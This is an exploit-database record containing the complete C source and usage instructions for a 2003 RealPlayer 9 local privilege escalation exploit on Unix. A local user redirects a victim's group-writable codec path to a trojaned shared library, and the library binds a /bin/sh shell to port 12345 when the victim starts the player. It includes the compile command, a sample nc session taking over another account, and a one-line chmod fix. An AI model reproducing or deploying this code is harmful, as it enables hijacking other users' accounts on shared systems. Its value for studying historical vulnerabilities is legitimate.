RealPlayer 9 *nix Local Privilege Escalation Exploit

{"type": "zdt", "lastseen": "2016-04-20T01:56:00", "bulletinFamily": "exploit", "cvelist": [], "history": [], "title": "RealPlayer 9 *nix Local Privilege Escalation Exploit", "published": "2003-09-09T00:00:00", "href": "http://0day.today/exploit/description/7314", "cvss": {"vector": "NONE", "score": 0}, "description": "Exploit for linux platform in category local exploits", "hash": "141d4cd5da4bc067131c833ab7f1f1376180df8d2aa1fd5ccc752478002a68d1", "references": [], "objectVersion": "1.0", "edition": 1, "sourceData": "====================================================\r\nRealPlayer 9 *nix Local Privilege Escalation Exploit\r\n====================================================\r\n\r\n\r\n/**\r\n * rp9-priv-esc.c \r\n *\r\n * A local privilege escalation attack against the community supported\r\n * version of Real.com's Realplayer, version 9.\r\n *\r\n * Written by:\r\n * \t\r\n * \tJon Hart warchild spoofed.org\r\n *\r\n * By default, configuration files are stored in ~$USER/.realnetworks/, \r\n * but all the files in there are group writeable. So long as ~$USER \r\n * has group execution permissions (which is pretty common), a malicious\r\n * local user can edit the config files of fellow users to do his biddings. \r\n *\r\n * There are a number of ways to attack this, but after some poking it seems\r\n * that modifying the path to shared libraries and writing my own malicious\r\n * shared libraries was the easiest. \r\n * \r\n * (as an aside, just because the shared libraries in the directories contained\r\n * in ~$USER/.realnetworks/RealShared_0_0/ are stripped doesn't mean we can't get \r\n * the symbols back. objdump quickly can tell us what the names of the 15 \r\n * functions are, and we can stub out a bogus shared library pretty quickly.)\r\n *\r\n * This particular bit of code is meant to replace the shared library \r\n * cook.so.6.0, which is contained in the Codecs directory. To execute this \r\n * attack against a fellow local user, first edit their config file \r\n * (~victim/.realnetworks/RealShared_0_0) to have the 'dt_codecs' variable\r\n * point to a directory under your control, like /tmp/Codecs. Copy all of the \r\n * existing files from the previous value of dt_codecs (which is usually something\r\n * like ~victim/Real/Codecs/) to /tmp/Codecs. Next, compile the code below as a\r\n * shared library and copy it to the trojaned directory:\r\n *\r\n * \r\n * `gcc -shared -fPIC -o /tmp/Codecs/cook.so.6.0 rp9-priv-esc.c`\r\n *\r\n *\tThe next time the victim fires up realplayer 9, a nice little shell \r\n * will be listening on port 12345 for you:\r\n *\r\n * guest@haiti:/$ id\r\n * uid=1006(guest) gid=100(users) groups=100(users)\r\n * guest@haiti:/$ nc localhost 12345\r\n * id\r\n * uid=1000(warchild) gid=100(users) groups=100(users),40(src),1003(wheel)\r\n *\r\n * Of course, you don't have to execute a shell. Do whatever makes you happy.\r\n *\r\n * Fix? `chmod 700 ~/.realnetworks/*`\r\n *\r\n * Copyright (c) 2003, Jon Hart \r\n * All rights reserved.\r\n *\r\n * Redistribution and use in source and binary forms, with or without modification, \r\n * are permitted provided that the following conditions are met:\r\n *\r\n * * Redistributions of source code must retain the above copyright notice, \r\n * this list of conditions and the following disclaimer.\r\n * * Redistributions in binary form must reproduce the above copyright notice, \r\n * this list of conditions and the following disclaimer in the documentation \r\n * and/or other materials provided with the distribution.\r\n * * Neither the name of the organization nor the names of its contributors may\r\n * be used to endorse or promote products derived from this software without \r\n * specific prior written permission.\r\n *\r\n *\r\n * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\" \r\n * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE \r\n * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE \r\n * ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE \r\n * LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL \r\n * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR \r\n * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER \r\n * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, \r\n * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE \r\n * USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\r\n *\r\n *\r\n *\r\n *\r\n */\r\n#define PORT 12345\r\n#include <stdio.h>\r\n#include <signal.h>\r\n#include <sys/types.h>\r\n#include <sys/socket.h>\r\n#include <netinet/in.h>\r\n#include <stdlib.h>\r\n\r\nvoid RAInitEncoder(void) { }\r\n/** This just happens to be one of the first \r\n * functions that realplayer calls after cook.so.6.0 is loaded\r\n */\r\nvoid RAOpenCodec2(void) { cookthis(); }\r\nvoid RAOpenCodec(void) { }\r\nvoid RAGetNumberOfFlavors(void) { }\r\nvoid RACloseCodec(void) { }\r\nvoid RADecode(void) { }\r\nvoid RAEncode(void) { }\r\nvoid RAFreeEncoder(void) { }\r\nvoid RAGetNumberOfFlavors2(void) { }\r\nvoid RAFreeDecoder(void) { }\r\nvoid RAFlush(void) { }\r\nvoid RAGetFlavorProperty(void) { }\r\nvoid G2(void) { }\r\nvoid RASetFlavor(void) { }\r\nvoid RAInitDecoder(void) { }\r\nvoid RACreateEncoderInstance(void) { }\r\n\r\n/* Bind /bin/sh to PORT. It forks\r\n * and all that good stuff, so it won't \r\n * easily go away.\r\n */\r\nint cookthis() {\r\n\r\n\r\n int sock_des, sock_client, sock_recv, sock_len, server_pid, client_pid;\r\n struct sockaddr_in server_addr; \r\n struct sockaddr_in client_addr;\r\n\r\n if ((sock_des = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1)\r\n exit(EXIT_FAILURE); \r\n\r\n bzero((char *) &server_addr, sizeof(server_addr));\r\n server_addr.sin_family = AF_INET; \r\n server_addr.sin_addr.s_addr = htonl(INADDR_ANY);\r\n server_addr.sin_port = htons(PORT);\r\n\r\n if ((sock_recv = bind(sock_des, (struct sockaddr *) &server_addr, sizeof(server_addr))) != 0) \r\n exit(EXIT_FAILURE); \r\n if (fork() != 0) \r\n exit(EXIT_SUCCESS); \r\n setpgrp(); \r\n signal(SIGHUP, SIG_IGN); \r\n if (fork() != 0) \r\n exit(EXIT_SUCCESS); \r\n if ((sock_recv = listen(sock_des, 5)) != 0)\r\n exit(EXIT_SUCCESS); \r\n while (1) { \r\n sock_len = sizeof(client_addr);\r\n if ((sock_client = accept(sock_des, (struct sockaddr *) &client_addr, &sock_len)) < 0)\r\n exit(EXIT_SUCCESS); \r\n client_pid = getpid(); \r\n server_pid = fork(); \r\n if (server_pid != 0) { \r\n dup2(sock_client,0); \r\n dup2(sock_client,1); \r\n dup2(sock_client,2);\r\n\r\n execl(\"/bin/sh\",\"realplay\",(char *)0); \r\n close(sock_client); \r\n exit(EXIT_SUCCESS); \r\n } \r\n close(sock_client);\r\n }\r\n}\r\n\r\n\r\n\r\n\r\n\n# 0day.today [2016-04-20] #", "id": "1337DAY-ID-7314", "sourceHref": "http://0day.today/exploit/7314", "modified": "2003-09-09T00:00:00", "reporter": "Jon Hart", "viewCount": 1, "enchantments": {"vulnersScore": 6.6}}